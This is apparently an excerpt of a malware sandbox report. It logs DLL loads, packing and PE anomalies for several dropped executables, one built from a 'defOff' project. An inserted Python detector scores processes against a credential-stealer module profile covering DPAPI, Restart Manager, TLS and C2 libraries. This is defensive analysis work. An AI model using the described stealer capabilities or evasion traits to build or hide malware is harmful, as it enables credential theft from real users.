Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
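The image-load lines above are a usable fingerprint of what each dropped binary is about to do: num.exe and H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe pull in wininet.dll (C2 transport), ncrypt.dll/ntasn1.dll (TLS) and rstrtmgr.dll (the Restart Manager API, commonly used by stealers and ransomware to get at files another process holds open, such as browser credential databases); 8138ba21a1.exe adds schannel.dll, dpapi.dll and rsaenh.dll (decrypting locally stored secrets) plus amsi.dll/wbemcomn.dll (WMI queries); taskkill.exe, a signed system binary, loads only the WMI and AMSI modules. The following is an added example, not part of the report: it scores processes from Sysmon-style image-load records using the same lines. The capability buckets, the threshold of three buckets and the trusted-directory rule are assumptions chosen for the demonstration.

```python
"""Score image-load records (one 'Source: <image> Section loaded: <dll>' line each)
against a credential-stealer module profile."""
import re
from collections import defaultdict

LOAD_RE = re.compile(r"^Source: (?P<image>.+?) Section loaded: (?P<module>\S+)$")
TRUSTED_DIR_RE = re.compile(r"^c:\\(windows|program files( \(x86\))?)\\", re.IGNORECASE)

# Capability buckets (assumed grouping for this example, not a vendor list).
PROFILE = {
    "http_client": {"wininet.dll", "winhttp.dll", "urlmon.dll", "webio.dll"},
    "tls": {"schannel.dll", "ncrypt.dll", "ncryptsslp.dll", "mskeyprotect.dll"},
    "local_crypto": {"dpapi.dll", "cryptsp.dll", "rsaenh.dll", "cryptbase.dll"},
    "file_unlock": {"rstrtmgr.dll"},
    "wmi_or_amsi": {"wbemcomn.dll", "amsi.dll"},
}

# Subset of the report lines above, embedded so the example runs offline.
SAMPLE_LOADS = r"""
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
""".strip().splitlines()


def parse_loads(lines):
    """Map image path -> set of lower-cased module names."""
    loads = defaultdict(set)
    for line in lines:
        m = LOAD_RE.match(line.strip())
        if m:
            loads[m["image"]].add(m["module"].lower())
    return loads


def matched_buckets(modules):
    """Names of the profile buckets that at least one loaded module falls into."""
    return sorted(name for name, mods in PROFILE.items() if modules & mods)


def score_processes(lines, min_buckets=3):
    """Flag a process outside Windows/Program Files that hits >= min_buckets buckets."""
    results = {}
    for image, modules in parse_loads(lines).items():
        buckets = matched_buckets(modules)
        untrusted = TRUSTED_DIR_RE.match(image) is None
        results[image] = {
            "buckets": buckets,
            "untrusted_path": untrusted,
            "suspicious": untrusted and len(buckets) >= min_buckets,
        }
    return results


if __name__ == "__main__":
    for image, verdict in score_processes(SAMPLE_LOADS).items():
        tag = "SUSPICIOUS" if verdict["suspicious"] else "ok"
        print(f"{tag:10} {image}  buckets={verdict['buckets']}")
```

On the lines above, num.exe (http_client, tls, file_unlock) and 8138ba21a1.exe (four buckets) are flagged, while skotes.exe, which at that point has only loaded winmm.dll and wininet.dll, and taskkill.exe, which sits under C:\Windows, are not; the loader stage and the signed utility look different from the stealer payloads even before any network traffic is seen.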
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 3015168 > 1048576
Source: file.exe Static PE information: Raw size of section vzkjjryc (0x2b6a00) is larger than 0x100000
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 3BW8PCDTI0L77ZRRJ1.exe, 00000006.00000003.1646138104.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, 3BW8PCDTI0L77ZRRJ1.exe, 00000006.00000002.1779664446.0000000000412000.00000040.00000001.01000000.0000000A.sdmp

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Unpacked PE file: 3.2.G4X9C8XP66LPZY0PX2HHB5N.exe.590000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iropgfss:EW;gmutwtzh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;iropgfss:EW;gmutwtzh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Unpacked PE file: 4.2.J2IWSCR5FJAMGGW2VC4ET4.exe.470000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fzxkvimr:EW;ubuokytu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fzxkvimr:EW;ubuokytu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 5.2.skotes.exe.5c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iropgfss:EW;gmutwtzh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;iropgfss:EW;gmutwtzh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Unpacked PE file: 6.2.3BW8PCDTI0L77ZRRJ1.exe.410000.0.unpack :EW;.rsrc:W;.idata :W;vxijesvo:EW;eoamyyhq:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 9.2.skotes.exe.5c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iropgfss:EW;gmutwtzh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;iropgfss:EW;gmutwtzh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Unpacked PE file: 10.2.8138ba21a1.exe.410000.0.unpack :EW;.rsrc :W;.idata :W;vzkjjryc:EW;glqpzueu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;vzkjjryc:EW;glqpzueu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Unpacked PE file: 14.2.bd214fbd32.exe.50000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fzxkvimr:EW;ubuokytu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fzxkvimr:EW;ubuokytu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Unpacked PE file: 34.2.bd214fbd32.exe.50000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fzxkvimr:EW;ubuokytu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fzxkvimr:EW;ubuokytu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Unpacked PE file: 39.2.5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.f80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iropgfss:EW;gmutwtzh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;iropgfss:EW;gmutwtzh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Unpacked PE file: 40.2.H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.290000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fzxkvimr:EW;ubuokytu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fzxkvimr:EW;ubuokytu:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: num.exe.7.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: random[1].exe.7.dr Static PE information: real checksum: 0x2ea199 should be: 0x2e2aca
Source: bd214fbd32.exe.7.dr Static PE information: real checksum: 0x1d5c72 should be: 0x1e322b
Source: H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.18.dr Static PE information: real checksum: 0x1d5c72 should be: 0x1e322b
Source: 3BW8PCDTI0L77ZRRJ1.exe.0.dr Static PE information: real checksum: 0x2a5a25 should be: 0x2ad370
Source: 5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.18.dr Static PE information: real checksum: 0x1dd786 should be: 0x1d2dcc
Source: 8138ba21a1.exe.7.dr Static PE information: real checksum: 0x2ea199 should be: 0x2e2aca
Source: random[1].exe0.7.dr Static PE information: real checksum: 0x1d5c72 should be: 0x1e322b
Source: J2IWSCR5FJAMGGW2VC4ET4.exe.0.dr Static PE information: real checksum: 0x1d5c72 should be: 0x1e322b
Source: file.exe Static PE information: real checksum: 0x2ea199 should be: 0x2e2aca
Source: skotes.exe.3.dr Static PE information: real checksum: 0x1dd786 should be: 0x1d2dcc
Source: num[1].exe.7.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: G4X9C8XP66LPZY0PX2HHB5N.exe.0.dr Static PE information: real checksum: 0x1dd786 should be: 0x1d2dcc
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: vzkjjryc
Source: file.exe Static PE information: section name: glqpzueu
Source: file.exe Static PE information: section name: .taggant
Source: 3BW8PCDTI0L77ZRRJ1.exe.0.dr Static PE information: section name:
Source: 3BW8PCDTI0L77ZRRJ1.exe.0.dr Static PE information: section name: .idata
Source: 3BW8PCDTI0L77ZRRJ1.exe.0.dr Static PE information: section name: vxijesvo
Source: 3BW8PCDTI0L77ZRRJ1.exe.0.dr Static PE information: section name: eoamyyhq
Source: 3BW8PCDTI0L77ZRRJ1.exe.0.dr Static PE information: section name: .taggant
Source: G4X9C8XP66LPZY0PX2HHB5N.exe.0.dr Static PE information: section name:
Source: G4X9C8XP66LPZY0PX2HHB5N.exe.0.dr Static PE information: section name: .idata
Source: G4X9C8XP66LPZY0PX2HHB5N.exe.0.dr Static PE information: section name:
Source: G4X9C8XP66LPZY0PX2HHB5N.exe.0.dr Static PE information: section name: iropgfss
Source: G4X9C8XP66LPZY0PX2HHB5N.exe.0.dr Static PE information: section name: gmutwtzh
Source: G4X9C8XP66LPZY0PX2HHB5N.exe.0.dr Static PE information: section name: .taggant
Source: J2IWSCR5FJAMGGW2VC4ET4.exe.0.dr Static PE information: section name:
Source: J2IWSCR5FJAMGGW2VC4ET4.exe.0.dr Static PE information: section name: .rsrc
Source: J2IWSCR5FJAMGGW2VC4ET4.exe.0.dr Static PE information: section name: .idata
Source: J2IWSCR5FJAMGGW2VC4ET4.exe.0.dr Static PE information: section name:
Source: J2IWSCR5FJAMGGW2VC4ET4.exe.0.dr Static PE information: section name: fzxkvimr
Source: J2IWSCR5FJAMGGW2VC4ET4.exe.0.dr Static PE information: section name: ubuokytu
Source: J2IWSCR5FJAMGGW2VC4ET4.exe.0.dr Static PE information: section name: .taggant
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: iropgfss
Source: skotes.exe.3.dr Static PE information: section name: gmutwtzh
